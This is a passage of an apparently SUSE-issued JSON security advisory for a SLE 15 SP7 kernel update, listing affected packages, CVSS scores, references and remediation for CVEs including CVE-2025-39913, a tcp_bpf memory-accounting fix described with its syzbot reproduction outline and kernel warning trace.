"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-39880"
},
{
"cve": "CVE-2025-39913",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39913"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp_bpf: Call sk_msg_free() when tcp_bpf_send_verdict() fails to allocate psock-\u003ecork.\n\nsyzbot reported the splat below. [0]\n\nThe repro does the following:\n\n 1. Load a sk_msg prog that calls bpf_msg_cork_bytes(msg, cork_bytes)\n 2. Attach the prog to a SOCKMAP\n 3. Add a socket to the SOCKMAP\n 4. Activate fault injection\n 5. Send data less than cork_bytes\n\nAt 5., the data is carried over to the next sendmsg() as it is\nsmaller than the cork_bytes specified by bpf_msg_cork_bytes().\n\nThen, tcp_bpf_send_verdict() tries to allocate psock-\u003ecork to hold\nthe data, but this fails silently due to fault injection + __GFP_NOWARN.\n\nIf the allocation fails, we need to revert the sk-\u003esk_forward_alloc\nchange done by sk_msg_alloc().\n\nLet\u0027s call sk_msg_free() when tcp_bpf_send_verdict fails to allocate\npsock-\u003ecork.\n\nThe \"*copied\" also needs to be updated such that a proper error can\nbe returned to the caller, sendmsg. It fails to allocate psock-\u003ecork.\nNothing has been corked so far, so this patch simply sets \"*copied\"\nto 0.\n\n[0]:\nWARNING: net/ipv4/af_inet.c:156 at inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156, CPU#1: syz-executor/5983\nModules linked in:\nCPU: 1 UID: 0 PID: 5983 Comm: syz-executor Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/12/2025\nRIP: 0010:inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156\nCode: 0f 0b 90 e9 62 fe ff ff e8 7a db b5 f7 90 0f 0b 90 e9 95 fe ff ff e8 6c db b5 f7 90 0f 0b 90 e9 bb fe ff ff e8 5e db b5 f7 90 \u003c0f\u003e 0b 90 e9 e1 fe ff ff 89 f9 80 e1 07 80 c1 03 38 c1 0f 8c 9f fc\nRSP: 0018:ffffc90000a08b48 EFLAGS: 00010246\nRAX: ffffffff8a09d0b2 RBX: dffffc0000000000 RCX: ffff888024a23c80\nRDX: 0000000000000100 RSI: 0000000000000fff RDI: 0000000000000000\nRBP: 0000000000000fff R08: ffff88807e07c627 R09: 1ffff1100fc0f8c4\nR10: dffffc0000000000 R11: ffffed100fc0f8c5 R12: ffff88807e07c380\nR13: dffffc0000000000 R14: ffff88807e07c60c R15: 1ffff1100fc0f872\nFS: 00005555604c4500(0000) GS:ffff888125af1000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00005555604df5c8 CR3: 0000000032b06000 CR4: 00000000003526f0\nCall Trace:\n \u003cIRQ\u003e\n __sk_destruct+0x86/0x660 net/core/sock.c:2339\n rcu_do_batch kernel/rcu/tree.c:2605 [inline]\n rcu_core+0xca8/0x1770 kernel/rcu/tree.c:2861\n handle_softirqs+0x286/0x870 kernel/softirq.c:579\n __do_softirq kernel/softirq.c:613 [inline]\n invoke_softirq kernel/softirq.c:453 [inline]\n __irq_exit_rcu+0xca/0x1f0 kernel/softirq.c:680\n irq_exit_rcu+0x9/0x30 kernel/softirq.c:696\n instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1052 [inline]\n sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1052\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39913",
"url": "https://www.suse.com/security/cve/CVE-2025-39913"
},
{
"category": "external",
"summary": "SUSE Bug 1250705 for CVE-2025-39913",
"url": "https://bugzilla.suse.com/1250705"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
